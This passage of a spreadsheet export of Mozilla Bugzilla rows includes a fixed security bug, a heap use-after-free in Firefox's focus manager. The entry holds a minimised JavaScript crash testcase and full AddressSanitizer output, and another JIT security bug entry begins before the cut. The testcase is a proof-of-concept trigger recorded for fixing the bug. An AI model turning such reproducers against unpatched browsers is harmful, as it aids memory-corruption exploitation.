          <t>Phabricator has a backoff system for the repository sync polling it does. What this means is if there has been a long time since a commit to a repository, Phabricator will wait longer to check for new commits. "arc land" and "arc commit" tell phabricator to look for new commits after they have pushed, so that syncing happens quickly.
Lando should be updated to tell phabricator as well. This can be done using the "diffusion.looksoon" conduit method.</t>
        </is>
      </c>
      <c r="X1392" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1393">
      <c r="A1393" t="n">
        <v>1459693</v>
      </c>
      <c r="B1393" t="inlineStr">
        <is>
          <t>2018-05-07 11:25:19 -0700</t>
        </is>
      </c>
      <c r="C1393" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsFocusManager::CheckIfFocusable</t>
        </is>
      </c>
      <c r="D1393" t="inlineStr">
        <is>
          <t>2024-05-30 09:45:55 -0700</t>
        </is>
      </c>
      <c r="E1393" t="n">
        <v>1</v>
      </c>
      <c r="F1393" t="n">
        <v>1</v>
      </c>
      <c r="G1393" t="n">
        <v>3</v>
      </c>
      <c r="H1393" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1393" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1393" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1393" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L1393" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1393" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1393" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1393" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1393" t="inlineStr">
        <is>
          <t>[adv-main61+][adv-esr52.9+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1393" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1393" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1393" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T1393" t="n">
        <v>1</v>
      </c>
      <c r="U1393" t="n">
        <v>0</v>
      </c>
      <c r="V1393" t="n">
        <v>23</v>
      </c>
      <c r="W1393" t="inlineStr">
        <is>
          <t>Created attachment 8973767
crash.html (minimised testcase)
The following testcase crashes a fuzzing build (--enable-fuzzing) of Firefox 61.0a1 (SourceStamp=b1628ac71fcc15797baec6083650bfcde650f190). It requires the fuzzing.enabled pref to be set to true.
&lt;script&gt;
function start() {	
	document.removeChild(document.documentElement);
	o0=document.createElement('HTML');
	o1144=document.createElement('LI');
	o1340=document.createElement('A');
	o1144.appendChild(o1340);
	o0.appendChild(o1144);
	document.appendChild(o0);
	window.top.setTimeout(fun0, 400);
}
function fun0() {
	o1662=document.createElement('input');
	o1662.type='number';
	o1340.appendChild(o1662);
	o1711=document.createElement('textarea');
	o0.appendChild(o1711);
	o1711.select();
	o1718=document.createElement('marquee');
	o0.addEventListener('DOMAttrModified',fun1);
	o0.appendChild(o1718);
	o1662.focus();
}
function fun1() {
	o0.remove();
	FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==10502==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500021439c at pc 0x7f6e33e45849 bp 0x7ffe54addfb0 sp 0x7ffe54addfa8
READ of size 4 at 0x61500021439c thread T0 (file:// Content)
    #0 0x7f6e33e45848 in GetBoolFlag /builds/worker/workspace/build/src/dom/base/nsINode.h:1644:12
    #1 0x7f6e33e45848 in IsInUncomposedDoc /builds/worker/workspace/build/src/dom/base/nsINode.h:654
    #2 0x7f6e33e45848 in GetPrimaryFrame /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:699
    #3 0x7f6e33e45848 in GetPrimaryFrame /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:1438
    #4 0x7f6e33e45848 in nsFocusManager::CheckIfFocusable(mozilla::dom::Element*, unsigned int) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1624
    #5 0x7f6e33e40fed in nsFocusManager::SetFocusInner(mozilla::dom::Element*, int, bool, bool) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1226:36
    #6 0x7f6e33e445ca in nsFocusManager::SetFocus(mozilla::dom::Element*, unsigned int) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:518:3
    #7 0x7f6e33bd0752 in mozilla::dom::Element::Focus(mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/Element.cpp:348:20
    #8 0x7f6e36bdf023 in mozilla::dom::HTMLInputElement::Focus(mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3198:27
    #9 0x7f6e36bdeb7f in mozilla::dom::HTMLInputElement::Focus(mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3182:22
    #10 0x7f6e35d7fad2 in mozilla::dom::HTMLElementBinding::focus(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGenericHTMLElement*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:540:9
    #11 0x7f6e36240b21 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3260:13
    #12 0x7f6e3cb05ff7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #13 0x7f6e3cb05ff7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #14 0x7f6e3caf06bf in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #15 0x7f6e3caf06bf in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #16 0x7f6e3cad6d63 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:417:12
    #17 0x7f6e3cb05d75 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:489:15
    #18 0x7f6e3cb06ff2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:535:10
    #19 0x7f6e3d637c2a in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2989:12
    #20 0x7f6e35b86e9d in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:40:8
    #21 0x7f6e33ac3bdb in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:73:12
    #22 0x7f6e33ac3bdb in nsGlobalWindowInner::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:6658
    #23 0x7f6e33ce1456 in mozilla::dom::TimeoutManager::RunTimeout(mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /builds/worker/workspace/build/src/dom/base/TimeoutManager.cpp:877:42
    #24 0x7f6e33ce0734 in mozilla::dom::TimeoutExecutor::MaybeExecute() /builds/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:172:11
    #25 0x7f6e33ce2936 in Notify /builds/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp:240:5
    #26 0x7f6e33ce2936 in non-virtual thunk to mozilla::dom::TimeoutExecutor::Notify(nsITimer*) /builds/worker/workspace/build/src/dom/base/TimeoutExecutor.cpp
    #27 0x7f6e30babd9b in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:704:40
    #28 0x7f6e30b7b429 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:290:11
    #29 0x7f6e30b97c87 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /builds/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:188:22
    #30 0x7f6e30b978bf in mozilla::ThrottledEventQueue::Inner::Executor::Run() /builds/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:72:15
    #31 0x7f6e30b6c641 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:337:32
    #32 0x7f6e30b8b439 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1090:14
    #33 0x7f6e30ba6e70 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #34 0x7f6e31a859e6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
    #35 0x7f6e319d94f9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #36 0x7f6e319d94f9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #37 0x7f6e319d94f9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #38 0x7f6e385a8e4a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #39 0x7f6e3c81cf9b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #40 0x7f6e319d94f9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #41 0x7f6e319d94f9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #42 0x7f6e319d94f9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #43 0x7f6e3c81c960 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:719:34
    #44 0x4f50dc in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #45 0x4f50dc in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #46 0x7f6e507d882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #47 0x42476c in _start (/fuzzer3/firefox/firefox+0x42476c)
0x61500021439c is located 28 bytes inside of 472-byte region [0x615000214380,0x615000214558)
freed by thread T0 (file:// Content) here:
    #0 0x4c5172 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7f6e30a18f30 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
    #2 0x7f6e30a2114f in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
    #3 0x7f6e30a2114f in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3925
    #4 0x7f6e30a2065d in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3746:9
    #5 0x7f6e30a244f2 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4315:21
    #6 0x7f6e33ec20de in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1488:3
    #7 0x7f6e35c574ca in mozilla::dom::FuzzingFunctionsBinding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:54:3
    #8 0x7f6e3cb05ff7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #9 0x7f6e3cb05ff7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #10 0x7f6e3caf06bf in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #11 0x7f6e3caf06bf in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #12 0x7f6e3cad6d63 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:417:12
    #13 0x7f6e3cb05d75 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:489:15
    #14 0x7f6e3cb06ff2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:535:10
    #15 0x7f6e3d637c2a in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2989:12
    #16 0x7f6e359cca75 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:51:8
    #17 0x7f6e36972c7e in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #18 0x7f6e36972c7e in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118
    #19 0x7f6e369743db in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1288:20
    #20 0x7f6e3695ea87 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:560:14
    #21 0x7f6e36962583 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:961:9
    #22 0x7f6e36964abb in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
    #23 0x7f6e33ea7bf8 in nsINode::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1079:5
    #24 0x7f6e36982ea3 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&amp;) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:204:13
    #25 0x7f6e368f8e8c in mozilla::AsyncEventDispatcher::Run() /builds/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:68:12
    #26 0x7f6e339f904f in nsContentUtils::RemoveScriptBlocker() /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5635:15
    #27 0x7f6e33dd7027 in nsDocument::EndUpdate(unsigned int) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5105:3
    #28 0x7f6e36d5849c in nsHTMLDocument::EndUpdate(unsigned int) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2120:15
    #29 0x7f6e38a79e1a in ~mozAutoDocConditionalContentUpdateBatch /builds/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:83:18
    #30 0x7f6e38a79e1a in ModifyDeclaration&lt;(lambda at /builds/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:297:5)&gt; /builds/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:287
    #31 0x7f6e38a79e1a in nsDOMCSSDeclaration::ParsePropertyValue(nsCSSPropertyID, nsTSubstring&lt;char16_t&gt; const&amp;, bool, nsIPrincipal*) /builds/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:295
    #32 0x7f6e34373c9a in SetMargin /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ServoCSSPropList.h:456:1
    #33 0x7f6e34373c9a in mozilla::dom::CSS2PropertiesBinding::set_margin(JSContext*, JS::Handle&lt;JSObject*&gt;, nsDOMCSSDeclaration*, JSJitSetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:31017
    #34 0x7f6e3623e223 in bool mozilla::dom::binding_detail::GenericSetter&lt;mozilla::dom::binding_detail::NormalThisPolicy&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3204:8
    #35 0x7f6e3cb05ff7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #36 0x7f6e3cb05ff7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #37 0x7f6e3cb08c26 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:516:12
    #38 0x7f6e3cb08c26 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:535
    #39 0x7f6e3cb08c26 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:664
previously allocated by thread T0 (file:// Content) here:
    #0 0x4c54b3 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x4f5f7d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:70:17
    #2 0x7f6e36bb06b9 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:156:12
    #3 0x7f6e36bb06b9 in NS_NewHTMLInputElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:120
    #4 0x7f6e36d38569 in CreateHTMLElement(unsigned int, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:252:41
    #5 0x7f6e33a21937 in nsContentUtils::NewXULOrHTMLElement(mozilla::dom::Element**, mozilla::dom::NodeInfo*, mozilla::dom::FromParser, nsAtom*, mozilla::dom::CustomElementDefinition*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:10017:18
    #6 0x7f6e36d384c8 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAtom*, mozilla::dom::CustomElementDefinition*) /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:235:10
    #7 0x7f6e33e211a0 in nsIDocument::CreateHTMLElement(nsAtom*) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:12378:28
    #8 0x7f6e390c5dbe in nsNumberControlFrame::MakeAnonymousElement(mozilla::dom::Element**, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;, nsAtom*, mozilla::CSSPseudoElementType) /builds/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:331:40
    #9 0x7f6e390c63eb in nsNumberControlFrame::CreateAnonymousContent(nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /builds/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:378:8
    #10 0x7f6e38bff0ae in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4172:26
    #11 0x7f6e38bf27fe in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, mozilla::ComputedStyle*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10265:3
    #12 0x7f6e38c086e1 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4041:9
    #13 0x7f6e38c11390 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6073:3
    #14 0x7f6e38bf1ee5 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;, nsContainerFrame*, bool, nsFrameItems&amp;) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10144:5
    #15 0x7f6e38c1e370 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsCSSFrameConstructor::InsertionKind) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7267:3
    #16 0x7f6e38bad73f in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&amp;) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1401:27
    #17 0x7f6e38bbaa95 in mozilla::RestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:3000:9
    #18 0x7f6e38b72723 in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:3077:3
    #19 0x7f6e38b72723 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4316
    #20 0x7f6e33df3d68 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:592:5
    #21 0x7f6e33df3d68 in nsIDocument::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7589
    #22 0x7f6e33e449d9 in FlushPendingNotifications /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7528:3
    #23 0x7f6e33e449d9 in nsFocusManager::CheckIfFocusable(mozilla::dom::Element*, unsigned int) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1605
    #24 0x7f6e33e40fed in nsFocusManager::SetFocusInner(mozilla::dom::Element*, int, bool, bool) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1226:36
    #25 0x7f6e33e445ca in nsFocusManager::SetFocus(mozilla::dom::Element*, unsigned int) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:518:3
    #26 0x7f6e36cd7df4 in mozilla::dom::HTMLTextAreaElement::Select() /builds/worker/workspace/build/src/dom/html/HTMLTextAreaElement.cpp:156:11
    #27 0x7f6e360533b7 in mozilla::dom::HTMLTextAreaElementBinding::select(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLTextAreaElement*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLTextAreaElementBinding.cpp:1390:9
    #28 0x7f6e36240b21 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3260:13
    #29 0x7f6e3cb05ff7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:280:15
    #30 0x7f6e3cb05ff7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #31 0x7f6e3caf06bf in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #32 0x7f6e3caf06bf in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3086
    #33 0x7f6e3cad6d63 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:417:12
    #34 0x7f6e3cb05d75 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:489:15
    #35 0x7f6e3cb06ff2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:535:10
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/base/nsINode.h:1644:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c2a8003a820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8003a830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8003a840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8003a850: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c2a8003a860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c2a8003a870: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8003a880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8003a890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8003a8a0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c2a8003a8b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2a8003a8c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0502==ABORTING</t>
        </is>
      </c>
      <c r="X1393" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1394">
      <c r="A1394" t="n">
        <v>1851599</v>
      </c>
      <c r="B1394" t="inlineStr">
        <is>
          <t>2023-09-05 06:08:58 -0700</t>
        </is>
      </c>
      <c r="C1394" t="inlineStr">
        <is>
          <t>Assertion failure: baselineScript_, at js/src/jit/JitScript.h:479</t>
        </is>
      </c>
      <c r="D1394" t="inlineStr">
        <is>
          <t>2024-05-30 11:14:14 -0700</t>
        </is>
      </c>
      <c r="E1394" t="n">
        <v>1</v>
      </c>
      <c r="F1394" t="n">
        <v>1</v>
      </c>
      <c r="G1394" t="n">
        <v>3</v>
      </c>
      <c r="H1394" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1394" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1394" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1394" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1394" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1394" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1394" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1394" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1394" t="inlineStr">
        <is>
          <t>[adv-main118+][adv-esr115.3+]</t>
        </is>
      </c>
      <c r="Q1394" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1394" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1394" t="inlineStr">
